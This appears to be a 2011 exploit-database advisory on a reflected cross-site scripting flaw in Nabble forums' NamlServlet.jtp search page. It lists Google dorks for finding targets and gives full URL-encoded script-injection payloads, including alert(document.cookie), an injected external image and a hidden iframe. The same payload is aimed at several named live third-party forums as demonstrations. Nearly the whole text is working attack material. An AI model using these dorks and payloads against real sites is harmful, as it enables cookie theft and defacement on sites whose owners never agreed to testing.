# Date: 13.10.2011 # Author: Sony # Software Link: http://www.nabble.com/ # Google Dorks: inurl:NamlServlet.jtp or inurl:/template/NamlServlet.jtp?macro=3D # Browser: Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2011/10/nabble-forums-cross-site-scripting.html .................................................................. Well.. We can see error on the page.. http://dwr.2114559.n2.nabble.com/template/NamlServlet.jtp?macro=3Dsearch_pa= ge%20&node=3D5394489&query=3Dxmlbeans Our XSS is here: template/NamlServlet.jtp?macro=3Dsearch_page[XSS]%20&node=3D5394489&query= =3Dxmlbeans After: http://dwr.2114559.n2.nabble.com/template/NamlServlet.jtp?macro=3Dsearch_pa= ge%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscri= pt%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%= 29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3C= img%20src=3D%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=3D%22he= ight:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=3Dhttp://www.youtube.= com/watch?v=3DTCUaQzw707M%22%20width=3D%220%22%20height=3D%220%22%20\%3E%3C= /div%3E&node=3D5394489&query=3Dxmlbeans Some Demo with Google Dorks: http://forum.nyskiblog.com/template/NamlServlet.jtp?macro=3Dsearch_page%20%= 22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ea= lert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/= script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20= src=3D%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=3D%22height:%= 20800px;%20width:%20950px;%22%3Ciframe%20src%20=3Dhttp://www.youtube.com/wa= tch?v=3DTCUaQzw707M%22%20width=3D%220%22%20height=3D%220%22%20\%3E%3C/div%3= E&node=3D5394489&query=3Dxmlbeans http://discuss.supergenpass.com/template/NamlServlet.jtp?macro=3Dsearch_pag= e%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscrip= t%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%2= 9%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Ci= mg%20src=3D%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=3D%22hei= ght:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=3Dhttp://www.youtube.c= om/watch?v=3DTCUaQzw707M%22%20width=3D%220%22%20height=3D%220%22%20\%3E%3C/= div%3E&node=3D5394489&query=3Dxmlbeans http://www.pcl-users.org/template/NamlServlet.jtp?macro=3Dsearch_page%20%22= %3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Eale= rt%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/sc= ript%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20sr= c=3D%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=3D%22height:%20= 800px;%20width:%20950px;%22%3Ciframe%20src%20=3Dhttp://www.youtube.com/watc= h?v=3DTCUaQzw707M%22%20width=3D%220%22%20height=3D%220%22%20\%3E%3C/div%3E&= node=3D5394489&query=3Dxmlbeans http://nabble.documentfoundation.org/template/NamlServlet.jtp?macro=3Dsearc= h_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3C= script%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony= %22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3= E%3Cimg%20src=3D%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=3D%= 22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=3Dhttp://www.yout= ube.com/watch?v=3DTCUaQzw707M%22%20width=3D%220%22%20height=3D%220%22%20\%3= E%3C/div%3E&node=3D5394489&query=3Dxmlbeans